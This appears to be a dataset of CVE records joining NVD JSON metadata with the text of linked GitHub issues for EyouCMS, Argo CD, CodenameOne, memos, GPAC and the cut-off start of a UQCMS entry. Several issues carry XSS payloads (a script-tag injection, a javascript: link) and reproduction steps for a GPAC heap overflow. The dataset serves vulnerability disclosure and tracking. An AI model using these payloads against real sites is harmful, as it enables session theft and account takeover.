"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/39"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/39"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "EB987CAE-6D4D-417A-8E0D-9DCC47F986EB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/weng-xianhu/eyoucms/issues/39 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | Version:V1.6.0-UTF8-SP1

1. Go to the background --> basic information--> home page description

Construct the JS script at the home page description and submit it.Payload:"><script>alert("XSS");</script>
2. Open the EyouCMS client

| Vulnerability: EyouCMS v1.6.0 has a vulnerability that stores cross-site scripting (XSS) | https://api.github.com/repos/weng-xianhu/eyoucms/issues/39/comments | 1 | 2022-11-19T06:37:02Z | 2023-02-20T08:21:46Z | https://github.com/weng-xianhu/eyoucms/issues/39 | 1,456,264,360 | 39 | 4,714 |
CVE-2023-25163 | 2023-02-08T21:15:10.847 | Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. All versions of Argo CD starting with v2.6.0-rc1 have an output sanitization bug which leaks repository access credentials in error messages. These error messages are visible to the user, and they are logged. The error message is visible when a user attempts to create or update an Application via the Argo CD API (and therefor the UI or CLI). The user must have `applications, create` or `applications, update` RBAC access to reach the code which may produce the error. The user is not guaranteed to be able to trigger the error message. They may attempt to spam the API with requests to trigger a rate limit error from the upstream repository. If the user has `repositories, update` access, they may edit an existing repository to introduce a URL typo or otherwise force an error message. But if they have that level of access, they are probably intended to have access to the credentials anyway. A patch for this vulnerability has been released in version 2.6.1. Users are advised to upgrade. There are no known workarounds for this vulnerability. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 4,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Not Applicable"
],
"url": "https://argo-cd.readthedocs.io/en/stable/operator-manual/rbac/"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/argoproj/argo-cd/issues/12309"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/argoproj/argo-cd/pull/12320"
},
{
"source": "security-advisories@github.com",
"tags": [
"Vendor Advisory"
],
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-mv6w-j4xc-qpfw"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Not Applicable"
],
"url": "https://argo-cd.readthedocs.io/en/stable/operator-manual/rbac/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/argoproj/argo-cd/issues/12309"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/argoproj/argo-cd/pull/12320"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-mv6w-j4xc-qpfw"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:argoproj:argo_cd:2.6.0:-:*:*:*:*:*:*",
"matchCriteriaId": "B006144B-912D-4010-8FD7-5747D1E7978F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:argoproj:argo_cd:2.6.0:rc1:*:*:*:*:*:*",
"matchCriteriaId": "4E9E8774-D703-4CE5-8B90-EE3CD7A45005",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:argoproj:argo_cd:2.6.0:rc2:*:*:*:*:*:*",
"matchCriteriaId": "EC71D67C-2326-401A-AB60-961A3C500FDC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:argoproj:argo_cd:2.6.0:rc3:*:*:*:*:*:*",
"matchCriteriaId": "F78053BA-9B03-4831-881A-8C71C8B583D8",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:argoproj:argo_cd:2.6.0:rc4:*:*:*:*:*:*",
"matchCriteriaId": "F5C06F6A-AB8A-4633-912E-B07046ECF5C8",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:argoproj:argo_cd:2.6.0:rc5:*:*:*:*:*:*",
"matchCriteriaId": "9B7D280E-A667-423A-ACE6-293D7AE8CC74",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:argoproj:argo_cd:2.6.0:rc6:*:*:*:*:*:*",
"matchCriteriaId": "B4488059-5CCC-445F-B65C-A16055CD7DC0",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:argoproj:argo_cd:2.6.0:rc7:*:*:*:*:*:*",
"matchCriteriaId": "B2A7FB64-3210-4D5B-B1C5-0CCBE334B6F6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"532"
] | 532 | https://github.com/argoproj/argo-cd/issues/12309 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"argoproj",
"argo-cd"
] | <!-- If you are trying to resolve an environment-specific issue or have a one-off question about the edge case that does not require a feature then please consider asking a question in argocd slack [channel](https://argoproj.github.io/community/join-slack). -->
Checklist:
* [x] I've searched in the docs and FAQ for my answer: https://bit.ly/argocd-faq.
* [ ] I've included steps to reproduce the bug.
* [x] I've pasted the output of `argocd version`.
**Describe the bug**
When trying to create an application, I saw in both a popup in the frontend UI, *and* in the logs from the server:
```
time="2023-02-07T03:07:17Z" level=info msg="finished unary call with code InvalidArgument" error="rpc error: code = InvalidArgument desc = application spec for argocd-admin is invalid: InvalidSpecError: repository not accessible: repositories not accessible: &Repository{Repo:https://github.com/james-callahan/gitops,Username:,Password:,SSHPrivateKey:,ConnectionState:ConnectionState{Status:,Message:,ModifiedAt:<nil>,},InsecureIgnoreHostKey:false,Insecure:false,EnableLFS:false,TLSClientCertData:,TLSClientCertKey:,Type:,Name:,InheritedCreds:true,EnableOCI:false,GithubAppPrivateKey:-----BEGIN RSA PRIVATE KEY-----\nTHEACTUALPRIVATEKEY\n-----END RSA PRIVATE KEY-----\n,GithubAppId:12345,GithubAppInstallationId:12345,GitHubAppEnterpriseBaseURL:,Proxy:,Project:,GCPServiceAccountKey:,ForceHttpBasicAuth:false,}" grpc.code=InvalidArgument grpc.method=Update grpc.service=application.ApplicationService grpc.start_time="2023-02-07T03:07:17Z" grpc.time_ms=38.558 span.kind=server system=grpc
```
where `THEACTUALPRIVATEKEY` is the actual private key for my github app.
**Expected behavior**
secret fields shouldn't be printed as part of error messages
**Version**
```shell
argocd-server: v2.6.0+acc554f
``` | Github App Private Key printed on auth failure | https://api.github.com/repos/argoproj/argo-cd/issues/12309/comments | 1 | 2023-02-07T03:15:48Z | 2023-02-08T19:52:55Z | https://github.com/argoproj/argo-cd/issues/12309 | 1,573,609,361 | 12,309 | 4,715 |
CVE-2022-4903 | 2023-02-10T15:15:11.717 | A vulnerability was found in CodenameOne 7.0.70. It has been classified as problematic. Affected is an unknown function. The manipulation leads to use of implicit intent for sensitive communication. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. Upgrading to version 7.0.71 is able to address this issue. The patch is identified as dad49c9ef26a598619fc48d2697151a02987d478. It is recommended to upgrade the affected component. VDB-220470 is the identifier assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.1,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 4.9,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch"
],
"url": "https://github.com/codenameone/CodenameOne/commit/dad49c9ef26a598619fc48d2697151a02987d478"
},
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/codenameone/CodenameOne/issues/3583"
},
{
"source": "cna@vuldb.com",
"tags": [
"Release Notes"
],
"url": "https://github.com/codenameone/CodenameOne/releases/tag/7.0.71"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.220470"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?id.220470"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/codenameone/CodenameOne/commit/dad49c9ef26a598619fc48d2697151a02987d478"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/codenameone/CodenameOne/issues/3583"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/codenameone/CodenameOne/releases/tag/7.0.71"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.220470"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?id.220470"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:codenameone:codename_one:7.0.70:*:*:*:*:*:*:*",
"matchCriteriaId": "701DEA65-7129-4877-B7E3-2CF2B3295648",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"668"
] | 668 | https://github.com/codenameone/CodenameOne/issues/3583 | [
"Issue Tracking",
"Patch"
] | github.com | [
"codenameone",
"CodenameOne"
] | Seems Google is complaining about something else now

The link brings here https://support.google.com/faqs/answer/10437428
This error doesn't prevent from publishing, but appears in the Release Dashboard | Implicit pending intent error | https://api.github.com/repos/codenameone/CodenameOne/issues/3583/comments | 0 | 2022-04-22T15:20:36Z | 2022-04-23T04:50:27Z | https://github.com/codenameone/CodenameOne/issues/3583 | 1,212,493,149 | 3,583 | 4,716 |
CVE-2022-25978 | 2023-02-15T05:15:11.540 | All versions of the package github.com/usememos/memos/server are vulnerable to Cross-site Scripting (XSS) due to insufficient checks on external resources, which allows malicious actors to introduce links starting with a javascript: scheme.
| {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.5,
"source": "report@snyk.io",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "report@snyk.io",
"tags": [
"Patch"
],
"url": "https://github.com/usememos/memos/commit/b11d2130a084385eb65c3761a3c841ebe9f81ae8"
},
{
"source": "report@snyk.io",
"tags": [
"Exploit"
],
"url": "https://github.com/usememos/memos/issues/1026"
},
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMUSEMEMOSMEMOSSERVER-3319070"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/usememos/memos/commit/b11d2130a084385eb65c3761a3c841ebe9f81ae8"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "https://github.com/usememos/memos/issues/1026"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMUSEMEMOSMEMOSSERVER-3319070"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:usememos:memos:*:*:*:*:*:*:*:*",
"matchCriteriaId": "22F12AF0-BE09-45E5-B310-D7D4DD5DD4DD",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/usememos/memos/issues/1026 | [
"Exploit"
] | github.com | [
"usememos",
"memos"
] | ### Describe the bug
The memos application allows users to add resources from an external link. It was found that there are no checks on the added link, thus allowing a malicious user to introduce links starting with `javascript: ` scheme . If the user creates a public note with an external resource pointing to a malicious link `javascript:alert(1)`, it would be possible to achieve XSS and steal the other users private notes or impersonate their accounts .
It's advised to only allow external resources that are served from https:// websites in order to mitigate this vulnerability.
### Steps to reproduce
1- Create a resource and choose External Link
2- Type the following link: javascript:alert(document.domain)
3- Choose the type as application/* and add the resource
4- Now create a new public note and add the malicious external resource
5- If a user or the admin clicks the external resource, the malicious JS code will be executed on their behalf
### Screenshots or additional context
_No response_ | XSS Due to insufficient checks on the external resources | https://api.github.com/repos/usememos/memos/issues/1026/comments | 3 | 2023-02-05T20:47:30Z | 2023-02-14T10:32:29Z | https://github.com/usememos/memos/issues/1026 | 1,571,606,999 | 1,026 | 4,717 |
CVE-2023-0841 | 2023-02-15T14:15:13.283 | A vulnerability, which was classified as critical, has been found in GPAC 2.3-DEV-rev40-g3602a5ded. This issue affects the function mp3_dmx_process of the file filters/reframe_mp3.c. The manipulation leads to heap-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221087. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": null,
"url": "https://github.com/advisories/GHSA-w52x-cp47-xhhw"
},
{
"source": "cna@vuldb.com",
"tags": null,
"url": "https://github.com/gpac/gpac/commit/851560e3dc8155d45ace4b0d77421f241ed71dc4"
},
{
"source": "cna@vuldb.com",
"tags": null,
"url": "https://github.com/gpac/gpac/issues/2396"
},
{
"source": "cna@vuldb.com",
"tags": null,
"url": "https://github.com/gpac/gpac/releases/tag/v2.2.1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit"
],
"url": "https://github.com/qianshuidewajueji/poc/blob/main/gpac/mp3_dmx_process_poc3"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.221087"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.221087"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/advisories/GHSA-w52x-cp47-xhhw"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/gpac/gpac/commit/851560e3dc8155d45ace4b0d77421f241ed71dc4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/gpac/gpac/issues/2396"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/gpac/gpac/releases/tag/v2.2.1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "https://github.com/qianshuidewajueji/poc/blob/main/gpac/mp3_dmx_process_poc3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.221087"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.221087"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev40-g3602a5ded:*:*:*:*:*:*:*",
"matchCriteriaId": "BF8AB1FE-492D-4281-B779-FD501A50998C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/gpac/gpac/issues/2396 | null | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [x] I looked for a similar issue and couldn't find any.
- [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95
Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
# Version
```
MP4Box - GPAC version 2.3-DEV-rev40-g3602a5ded-master
(c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --enable-sanitizer --verbose
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
```
# Reproduce
complie and run
```
./configure --enable-sanitizer --enable-debug
make
./MP4Box -info mp3_dmx_process_poc2
```
information reported by sanitizer
```
[MP3Dmx] invalid frame, resyncing
=================================================================
==29937==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61a00000e322 at pc 0x7fe02eb39490 bp 0x7ffdcd4a3c40 sp 0x7ffdcd4a33e8
READ of size 316 at 0x61a00000e322 thread T0
#0 0x7fe02eb3948f in __interceptor_memcpy ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:790
#1 0x7fe02c490c9f in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34
#2 0x7fe02c490c9f in mp3_dmx_process filters/reframe_mp3.c:677
#3 0x7fe02c0700ed in gf_filter_process_task filter_core/filter.c:2828
#4 0x7fe02c032082 in gf_fs_thread_proc filter_core/filter_session.c:1859
#5 0x7fe02c03e856 in gf_fs_run filter_core/filter_session.c:2120
#6 0x7fe02ba7c806 in gf_media_import media_tools/media_import.c:1228
#7 0x55576950e3b1 in convert_file_info /home/qianshuidewajueji/gpac/applications/mp4box/fileimport.c:130
#8 0x5557694dddb5 in mp4box_main /home/qianshuidewajueji/gpac/applications/mp4box/mp4box.c:6302
#9 0x7fe028d14082 in __libc_start_main ../csu/libc-start.c:308
#10 0x5557694b1cfd in _start (/home/qianshuidewajueji/gpac/bin/gcc/MP4Box+0xa3cfd)
0x61a00000e322 is located 0 bytes to the right of 1186-byte region [0x61a00000de80,0x61a00000e322)
allocated by thread T0 here:
#0 0x7fe02ebabc3e in __interceptor_realloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:163
#1 0x7fe02c492248 in mp3_dmx_process filters/reframe_mp3.c:547
#2 0x7fe02c0700ed in gf_filter_process_task filter_core/filter.c:2828
#3 0x7fe02c032082 in gf_fs_thread_proc filter_core/filter_session.c:1859
#4 0x7fe02c03e856 in gf_fs_run filter_core/filter_session.c:2120
#5 0x7fe02ba7c806 in gf_media_import media_tools/media_import.c:1228
#6 0x55576950e3b1 in convert_file_info /home/qianshuidewajueji/gpac/applications/mp4box/fileimport.c:130
#7 0x5557694dddb5 in mp4box_main /home/qianshuidewajueji/gpac/applications/mp4box/mp4box.c:6302
#8 0x7fe028d14082 in __libc_start_main ../csu/libc-start.c:308
SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:790 in __interceptor_memcpy
Shadow bytes around the buggy address:
0x0c347fff9c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c347fff9c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c347fff9c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c347fff9c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c347fff9c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c347fff9c60: 00 00 00 00[02]fa fa fa fa fa fa fa fa fa fa fa
0x0c347fff9c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c347fff9c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c347fff9c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c347fff9ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c347fff9cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==29937==ABORTING
```
# Poc
https://github.com/qianshuidewajueji/poc/blob/main/gpac/mp3_dmx_process_poc2
| heap-buffer-overflow in function mp3_dmx_process filters/reframe_mp3.c:677 | https://api.github.com/repos/gpac/gpac/issues/2396/comments | 1 | 2023-02-09T14:19:15Z | 2023-02-13T16:32:29Z | https://github.com/gpac/gpac/issues/2396 | 1,577,978,840 | 2,396 | 4,718 |
CVE-2020-21120 | 2023-02-15T22:15:10.983 | SQL Injection vulnerability in file home\controls\cart.class.php in UQCMS 2.1.3, allows attackers execute arbitrary commands via the cookie_cart parameter to /index.php/cart/num. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Technical Description"
],
"url": "https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/alixiaowei/cve_test/issues/3"
},
{
